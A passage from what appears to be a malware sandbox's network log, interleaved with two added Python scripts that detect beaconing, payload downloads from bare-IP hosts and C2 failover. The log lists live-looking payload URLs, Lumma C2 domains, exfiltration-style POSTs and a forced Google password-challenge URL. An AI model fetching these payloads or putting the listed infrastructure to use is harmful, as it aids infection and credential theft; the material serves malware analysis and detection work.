                      Accept-Ranges: bytes
                    • [RU]
                      GET
                      http://31.41.244.11/files/hell911/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/hell911/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2660864
                      Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT
                      Connection: keep-alive
                      ETag: "675b72d4-289a00"
                      Accept-Ranges: bytes
                    • [RU]
                      GET
                      http://31.41.244.11/files/unique2/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/unique2/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:38 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1994240
                      Last-Modified: Fri, 13 Dec 2024 00:01:44 GMT
                      Connection: keep-alive
                      ETag: "675b7968-1e6e00"
                      Accept-Ranges: bytes
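The run of POSTs above (skotes.exe to /Zu7JuNko/index.php, a 31-byte body every few seconds, each answered with a 200 and a chunked text/html body) and the .exe fetches from 31.41.244.11 are the two shapes an analyst turns into detections. The script below is an added example, not the sandbox's own code nor a signature from this report: it parses entries in the layout this page uses (the excerpt is transcribed from the entries above with most headers trimmed) and flags same-size POST beacons to bare-IP hosts and executables served as application/octet-stream from bare-IP hosts. The thresholds (three hits, coefficient of variation of the gaps at most 0.5) are assumptions.

```python
# Added example, not the sandbox's code: parse HTTP entries laid out as in this
# report, then flag regular same-size POST beacons and bare-IP payload downloads.
import ipaddress
from collections import defaultdict
from email.utils import parsedate_to_datetime
from urllib.parse import urlparse
# Constructed excerpt transcribed from entries on the page, headers trimmed.
SAMPLE = """\
• [RU]
  POST
  http://185.215.113.43/Zu7JuNko/index.php
  skotes.exe
  Content-Length: 31
  Response
  Date: Fri, 13 Dec 2024 00:07:16 GMT
• [RU]
  POST
  http://185.215.113.43/Zu7JuNko/index.php
  skotes.exe
  Content-Length: 31
  Response
  Date: Fri, 13 Dec 2024 00:07:19 GMT
• [RU]
  POST
  http://185.215.113.43/Zu7JuNko/index.php
  skotes.exe
  Content-Length: 31
  Response
  Date: Fri, 13 Dec 2024 00:07:24 GMT
• [RU]
  GET
  http://31.41.244.11/files/burpin1/random.exe
  skotes.exe
  Response
  Content-Type: application/octet-stream
  Content-Length: 4438776
"""

def parse_entries(text):
    """One dict per bullet; 'Key: Value' lines before 'Response' are request headers."""
    entries, cur, section = [], None, "req"
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):            # new entry; the rest is the country marker
            cur = {"head": [], "req": {}, "resp": {}}
            entries.append(cur)
            section = "req"
        elif cur is None or not line:
            continue
        elif line in ("Request", "Response"):
            section = "resp" if line == "Response" else "req"
        elif ": " in line:                  # "Remote address:" has no value and is skipped
            key, val = line.split(": ", 1)
            cur[section][key.lower()] = val
        elif len(cur["head"]) < 3:          # the method, URL and process lines
            cur["head"].append(line)
    for e in entries:
        e["method"], e["url"], e["process"] = (e["head"] + [None] * 3)[:3]
    return entries

def is_bare_ip(host):
    try:
        return ipaddress.ip_address(host) is not None
    except ValueError:
        return False

def detect_beacons(entries, min_hits=3, max_cv=0.5):
    """Same-size POSTs from one process to one bare-IP URL at regular intervals; regularity
    is the coefficient of variation of gaps between response Dates (thresholds assumed)."""
    groups = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and is_bare_ip(urlparse(e["url"] or "").hostname or ""):
            groups[(e["process"], e["url"], e["req"].get("content-length"))].append(e)
    hits = []
    for (proc, url, clen), es in groups.items():
        times = sorted(parsedate_to_datetime(e["resp"]["date"]).timestamp() for e in es if "date" in e["resp"])
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(es) < min_hits or len(gaps) < 2 or not sum(gaps):
            continue
        mean = sum(gaps) / len(gaps)
        cv = (sum((g - mean) ** 2 for g in gaps) / len(gaps)) ** 0.5 / mean
        if cv <= max_cv:
            hits.append({"process": proc, "url": url, "body_len": clen, "count": len(es),
                         "mean_gap_s": round(mean, 1), "cv": round(cv, 2)})
    return hits

def detect_payload_downloads(entries):
    """GET of an .exe served as application/octet-stream from a bare-IP host."""
    out = []
    for e in entries:
        u = urlparse(e["url"] or "")
        if (e["method"] == "GET" and is_bare_ip(u.hostname or "") and u.path.lower().endswith(".exe")
                and e["resp"].get("content-type", "").startswith("application/octet-stream")):
            out.append({"process": e["process"], "url": e["url"], "size": int(e["resp"].get("content-length", "0"))})
    return out

if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    print(detect_beacons(recs), detect_payload_downloads(recs))
```

The Date header is the remote server's clock, so the interval estimate inherits that server's time and one-second granularity; in a live capture prefer the sensor's own timestamps. Note that every beacon POST above received a 200 with a chunked text/html body, so the response alone does not separate a live C2 from a dead one; the fixed request size and the cadence do.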
                    • [US]
                      DNS
                      drive-connect.cyou
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      drive-connect.cyou
                      IN A
                      Response
                      drive-connect.cyou
                      IN A
                      172.67.139.78
                      drive-connect.cyou
                      IN A
                      104.21.79.7
                    • [US]
                      POST
                      https://drive-connect.cyou/api
                      45c3c2bb5b.exe
                      Remote address:
                      172.67.139.78:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: drive-connect.cyou
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Set-Cookie: PHPSESSID=8a4t0mgre7apvskvv9so9bsntu; expires=Mon, 07-Apr-2025 17:53:59 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8CWn168P3e82XdnH%2F12FJ5VPzOPTFR%2Fq1bn1WKirCO2aW%2B8swfTtytzgtBdJKNGDWcwlhhLdJptX2dD1jZRIWDKoOVCxIcCW%2F0fXnRapXsm8ns4BGzLDv%2F1H6a2fb84qITzgp4%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f11b69d5f014183-LHR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=39832&min_rtt=26344&rtt_var=32243&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=133013&cwnd=252&unsent_bytes=0&cid=4fd11670ede3237d&ts=360&x=0"
                    • [US]
                      DNS
                      t.me
                      4b025ca5ea.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      t.me
                      IN A
                      Response
                      t.me
                      IN A
                      149.154.167.99
                    • [US]
                      DNS
                      steamcommunity.com
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      steamcommunity.com
                      IN A
                      Response
                      steamcommunity.com
                      IN A
                      23.214.143.155
                    • [GB]
                      GET
                      https://steamcommunity.com/profiles/76561199807592927
                      4b025ca5ea.exe
                      Remote address:
                      23.214.143.155:443
                      Request
                      GET /profiles/76561199807592927 HTTP/1.1
                      Host: steamcommunity.com
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                      Cache-Control: no-cache
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Length: 35248
                      Connection: keep-alive
                      Set-Cookie: sessionid=7cb1ab653246d2d58adad597; Path=/; Secure; SameSite=None
                      Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                    • [FI]
                      GET
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      GET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [FI]
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----PHVAI5F3EKF37QQQI5XL
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 256
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [US]
                      DNS
                      se-blurry.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      se-blurry.biz
                      IN A
                      Response
                    • [FI]
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----6FCB1VS0ZU37YM79ZUS0
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [FI]
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----VAI58YM7QQ9ZMYCT26FC
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [FI]
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----1VKX4WLNYCBAIMGLF37G
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 300
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [US]
                      DNS
                      zinc-sneark.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      zinc-sneark.biz
                      IN A
                      Response
                    • [FI]
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [FI]
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----6XLX4W47GVAAIE3WBIMG
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [RU]
                      GET
                      http://185.215.113.16/well/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /well/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:24 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 970240
                      Last-Modified: Thu, 12 Dec 2024 23:07:55 GMT
                      Connection: keep-alive
                      ETag: "675b6ccb-ece00"
                      Accept-Ranges: bytes
                    • [RU]
                      GET
                      http://185.215.113.16/steam/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /steam/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:27 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1795072
                      Last-Modified: Thu, 12 Dec 2024 23:09:14 GMT
                      Connection: keep-alive
                      ETag: "675b6d1a-1b6400"
                      Accept-Ranges: bytes
                    • [RU]
                      GET
                      http://185.215.113.16/off/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /off/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:31 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2838016
                      Last-Modified: Thu, 12 Dec 2024 23:08:21 GMT
                      Connection: keep-alive
                      ETag: "675b6ce5-2b4e00"
                      Accept-Ranges: bytes
                    • [US]
                      DNS
                      dwell-exclaim.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      dwell-exclaim.biz
                      IN A
                      Response
                    • [US]
                      DNS
                      formy-spill.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      formy-spill.biz
                      IN A
                      Response
                    • [US]
                      DNS
                      covery-mover.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      covery-mover.biz
                      IN A
                      Response
                      covery-mover.biz
                      IN A
                      104.21.58.186
                      covery-mover.biz
                      IN A
                      172.67.206.64
                    • [US]
                      POST
                      https://covery-mover.biz/api
                      45c3c2bb5b.exe
                      Remote address:
                      104.21.58.186:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: covery-mover.biz
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Set-Cookie: PHPSESSID=kbc0h54668srqs99p2vol4odda; expires=Mon, 07-Apr-2025 17:54:06 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BAGoospFkgNKvYKvkPtiR2S7itHzge8IjItLI0BH26BdMC%2B0pFhvN2ddep2OtYLOf3UxAqhMY%2BUXabjXM9WKr6OaE6q4Rt0ZH8XXHFWfi4%2BhXEnzxWUd%2FxQXDKZuRnzsUWiJ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f11b6cd0eb060e8-LHR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=28285&min_rtt=27150&rtt_var=7517&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=584&delivery_rate=129608&cwnd=252&unsent_bytes=0&cid=ede52f6f98c3e128&ts=234&x=0"
                    • [US]
                      DNS
                      dare-curbys.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      dare-curbys.biz
                      IN A
                      Response
                    • [US]
                      DNS
                      dare-curbys.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      dare-curbys.biz
                      IN A
                      Response
                    • [RU]
                      GET
                      http://185.215.113.206/
                      1206054524.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      GET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:30 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [RU]
                      POST
                      http://185.215.113.206/c4becf79229cb002.php
                      1206054524.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      POST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDB
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:30 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [US]
                      DNS
                      print-vexer.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      print-vexer.biz
                      IN A
                      Response
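Two sequence patterns in the entries above are worth encoding. First, 45c3c2bb5b.exe walks the Lumma C2 list from the extracted configuration: se-blurry.biz, zinc-sneark.biz, dwell-exclaim.biz, formy-spill.biz, dare-curbys.biz and print-vexer.biz return no A record, while drive-connect.cyou and covery-mover.biz resolve (both behind Cloudflare) and each receives the 8-byte POST /api. Second, 4b025ca5ea.exe fetches a Steam profile and, with the same response Date second, opens its first connection to 95.216.181.44, then sends multipart POSTs there. The code below is an added example, not the sandbox's logic; its event lists are transcribed from the page (the report attributes the steamcommunity.com lookup to 45c3c2bb5b.exe and the GET to 4b025ca5ea.exe, and that is kept as shown). The thresholds, the profile-host list and the reading of the second pattern as a possible dead-drop resolver are assumptions for the analyst to confirm against the profile content, not findings of the report.

```python
# Added example, not the sandbox's code: sequence heuristics over the DNS and
# HTTP entries of this report. Event lists are transcribed from the page; the
# thresholds and PROFILE_HOSTS are assumptions.
import ipaddress
from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import urlparse

# (process, queried name, A answers) in report order
DNS = [
    ("45c3c2bb5b.exe", "drive-connect.cyou", ["172.67.139.78", "104.21.79.7"]),
    ("4b025ca5ea.exe", "t.me", ["149.154.167.99"]),
    ("45c3c2bb5b.exe", "steamcommunity.com", ["23.214.143.155"]),
    ("45c3c2bb5b.exe", "se-blurry.biz", []),
    ("45c3c2bb5b.exe", "zinc-sneark.biz", []),
    ("45c3c2bb5b.exe", "dwell-exclaim.biz", []),
    ("45c3c2bb5b.exe", "formy-spill.biz", []),
    ("45c3c2bb5b.exe", "covery-mover.biz", ["104.21.58.186", "172.67.206.64"]),
    ("45c3c2bb5b.exe", "dare-curbys.biz", []),
    ("45c3c2bb5b.exe", "dare-curbys.biz", []),
    ("45c3c2bb5b.exe", "print-vexer.biz", []),
    ("firefox.exe", "youtube.com", ["172.217.18.206"]),
]
# (process, method, URL, response Date as HH:MM:SS on 13 Dec 2024) in report order
HTTP = [
    ("45c3c2bb5b.exe", "POST", "https://drive-connect.cyou/api", "00:07:20"),
    ("4b025ca5ea.exe", "GET", "https://steamcommunity.com/profiles/76561199807592927", "00:07:19"),
    ("4b025ca5ea.exe", "GET", "https://95.216.181.44/", "00:07:19"),
    ("4b025ca5ea.exe", "POST", "https://95.216.181.44/", "00:07:20"),
    ("45c3c2bb5b.exe", "POST", "https://covery-mover.biz/api", "00:07:27"),
    ("1206054524.exe", "GET", "http://185.215.113.206/", "00:07:30"),
    ("1206054524.exe", "POST", "http://185.215.113.206/c4becf79229cb002.php", "00:07:30"),
]
PROFILE_HOSTS = {"steamcommunity.com", "t.me"}  # assumed list; both names appear in the report


def ts(hms):
    """Seconds since epoch for a Date-header clock reading on the report's day (UTC)."""
    return datetime.strptime("2024-12-13 " + hms, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc).timestamp()


def is_bare_ip(host):
    try:
        return ipaddress.ip_address(host) is not None
    except ValueError:
        return False


def detect_c2_failover(dns, http, min_dead=3):
    """A process that queries several distinct names with no A answer and then
    talks to one that did resolve: the shape of a client walking a hardcoded
    C2 list until a domain is alive."""
    dead, live, contacted = defaultdict(set), defaultdict(list), defaultdict(set)
    for proc, name, answers in dns:
        if answers:
            if name not in live[proc]:
                live[proc].append(name)
        else:
            dead[proc].add(name)
    for proc, _method, url, _t in http:
        contacted[proc].add(urlparse(url).hostname)
    findings = []
    for proc, names in dead.items():
        used = [n for n in live[proc] if n in contacted[proc]]
        if len(names) >= min_dead and used:
            findings.append({"process": proc, "dead": sorted(names), "live_contacted": used})
    return findings


def detect_profile_then_ip(http, window_s=5):
    """GET to a public-profile host followed within window_s by the same
    process's next request to a bare-IP host: consistent with a dead-drop
    resolver, but only the profile content can confirm that."""
    by_proc = defaultdict(list)
    for proc, method, url, t in http:
        by_proc[proc].append((method, url, ts(t)))
    findings = []
    for proc, reqs in by_proc.items():
        for i, (method, url, t) in enumerate(reqs):
            if method != "GET" or urlparse(url).hostname not in PROFILE_HOSTS:
                continue
            for _m2, url2, t2 in reqs[i + 1:]:
                if is_bare_ip(urlparse(url2).hostname or "") and 0 <= t2 - t <= window_s:
                    findings.append({"process": proc, "profile": url, "then": url2, "delay_s": t2 - t})
                    break
    return findings


if __name__ == "__main__":
    print(detect_c2_failover(DNS, HTTP))
    print(detect_profile_then_ip(HTTP))
```

The failover check deliberately keys on the process rather than on the domains, so it still fires when the C2 list changes between builds; the names it reports as dead are the ones to pre-register in a sinkhole or block list, and the live ones are where the 8-byte POST /api went. The profile check is a lead, not a verdict: the 1206054524.exe entries (a GET / answered with Content-Length 0, then a multipart POST to /c4becf79229cb002.php) hit a bare IP too but never touch a profile host, so they do not match it.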
                    • [US]
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • [US]
                      DNS
                      spocs.getpocket.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      spocs.getpocket.com
                      IN A
                      Response
                      spocs.getpocket.com
                      IN CNAME
                      prod.ads.prod.webservices.mozgcp.net
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • [US]
                      DNS
                      getpocket.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      getpocket.cdn.mozilla.net
                      IN A
                      Response
                      getpocket.cdn.mozilla.net
                      IN CNAME
                      getpocket-cdn.prod.mozaws.net
                      getpocket-cdn.prod.mozaws.net
                      IN CNAME
                      prod.pocket.prod.cloudops.mozgcp.net
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • flag-fr
                      GET
                      https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                      host: youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-fr
                      GET
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                      host: www.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      cookie: YSC=TFrx57vzYjQ
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-us
                      GET
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      firefox.exe
                      Remote address:
                      34.120.5.221:443
                      Request
                      GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                      host: getpocket.cdn.mozilla.net
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      sec-fetch-dest: empty
                      sec-fetch-mode: cors
                      sec-fetch-site: cross-site
                      if-none-match: W/"53a0-pN9JStWPWItMnxI0JH+7qixNT6k"
                      te: trailers
                    • flag-us
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • flag-us
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
